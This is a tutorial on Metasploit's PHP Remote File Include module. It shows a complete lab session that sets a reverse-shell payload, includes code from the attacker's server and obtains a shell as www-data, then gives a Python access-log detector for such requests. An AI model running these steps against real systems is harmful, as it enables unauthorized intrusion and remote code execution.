Using the Metasploit PHP Remote File Include Module
Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from an RFI.
It is not too complicated to use: set your normal RHOST/RPORT options, set the PATH, and set PHPURI to the vulnerable path, putting XXpathXX where you would normally put your PHP shell. So we take something like Simple Text-File Login Remote File Include, which has a vulnerable string of:
/[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]
and make your PHPURI
PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
Let's see it in action:
msf > search php_include
[*] Searching loaded modules for pattern 'php_include'...
Exploits
========
Name                     Rank       Description
----                     ----       -----------
unix/webapp/php_include  excellent  PHP Remote File Include Generic Exploit
msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > info
Name: PHP Remote File Include Generic Exploit
Version: 8762
Platform: PHP
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
hdm
egypt
Available targets:
Id  Name
--  ----
0   Automatic
Basic options:
Name        Current Setting                                              Required  Description
----        ---------------                                              --------  -----------
PATH        /                                                            yes       The base directory to prepend to the URL to try
PHPRFIDB    /home/cg/evil/msf3/dev2/data/exploits/php/rfi-locations.dat  no        A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI                                                                   no        The URI to request, with the include parameter changed to XXpathXX
Proxies                                                                  no        Use a proxy chain
RHOST                                                                    yes       The target address
RPORT       80                                                           yes       The target port
SRVHOST     0.0.0.0                                                      yes       The local host to listen on.
SRVPORT     8080                                                         yes       The local port to listen on.
SSL         false                                                        no        Negotiate SSL for incoming connections
SSLVersion  SSL3                                                         no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH                                                                  no        The URI to use for this exploit (default is random)
VHOST                                                                    no        HTTP server virtual host
Payload information:
Space: 32768
Description:
This module can be used to exploit any generic PHP file include
vulnerability, where the application includes code like the
following:
msf exploit(php_include) > set PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
PHPURI => /slogin_lib.inc.php?slogin_path=XXpathXX
msf exploit(php_include) > set PATH /1/
PATH => /1/
msf exploit(php_include) > set RHOST 192.168.6.68
RHOST => 192.168.6.68
msf exploit(php_include) > set RPORT 8899
RPORT => 8899
msf exploit(php_include) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(php_include) > set LHOST 192.168.6.140
LHOST => 192.168.6.140
msf exploit(php_include) > exploit
[*] Started bind handler
[*] Using URL: http://192.168.6.140:8080/RvSIqhdft
[*] PHP include server started.
[*] Sending /1/slogin_lib.inc.php?slogin_path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%36%2e%31%34%30%3a%38%30%38%30%2f%52%76%53%49%71%68%64%66%74%3f
[*] Command shell session 1 opened (192.168.6.140:34117 -> 192.168.6.68:8899) at Sun May 09 21:37:26 -0400 2010
dir
0.jpeg header.inc.php license.txt slog_users.txt version.txt
1.jpeg index.asp old slogin.inc.php
adminlog.php install.txt readme.txt slogin_genpass.php
footer.inc.php launch.asp slog_users.php slogin_lib.inc.php
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
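On the defending side, the request in the "[*] Sending" line is what lands in the web server's access log: the include parameter carries a fully percent-encoded URL. The following is an added example (not from the original post or from Metasploit) that decodes query parameters in access-log lines and flags values that resolve to a remote URL or PHP stream wrapper. The Common Log Format layout, the function names, and every sample value other than the first request target are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Values that make PHP include()/require() pull in remote or wrapper content.
REMOTE = re.compile(r"\s*(?:(?:https?|ftps?|php|expect)://|data:)", re.I)
# Request target from a Common/Combined Log Format line.
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def decode_fully(value, max_rounds=3):
    """Percent-decode until stable so double-encoded values are normalised too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def rfi_candidates(log_line):
    """Return [(parameter, decoded value)] where the value is a remote URL."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    query = urlsplit(m.group(1)).query
    return [(name, decode_fully(value))
            for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE.match(decode_fully(value))]

# Constructed access-log lines. The first request target is the one in the
# "[*] Sending" line of the transcript; client IPs, timestamps, sizes and the
# other two requests are made up for this example.
SAMPLE_LOG = [
    '192.168.6.140 - - [09/May/2010:21:37:26 -0400] "GET /1/slogin_lib.inc.php'
    '?slogin_path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%36%2e%31%34%30'
    '%3a%38%30%38%30%2f%52%76%53%49%71%68%64%66%74%3f HTTP/1.1" 200 312',
    '192.0.2.7 - - [09/May/2010:21:40:02 -0400] "GET /1/index.php'
    '?page=about&ref=docs/http-notes.txt HTTP/1.1" 200 4096',
    '192.0.2.9 - - [09/May/2010:21:41:10 -0400] "GET /1/slogin_lib.inc.php'
    '?slogin_path=%2568%2574%2574%2570%253a%252f%252fexample.test%252fx HTTP/1.1" 200 312',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for name, value in rfi_candidates(line):
            print(f"possible RFI: {name}={value!r} <- {line.split()[0]}")
```

A plain-text search for "http://" in the raw log would miss the first and third lines, because every character of the scheme is percent-encoded; matching has to happen after decoding.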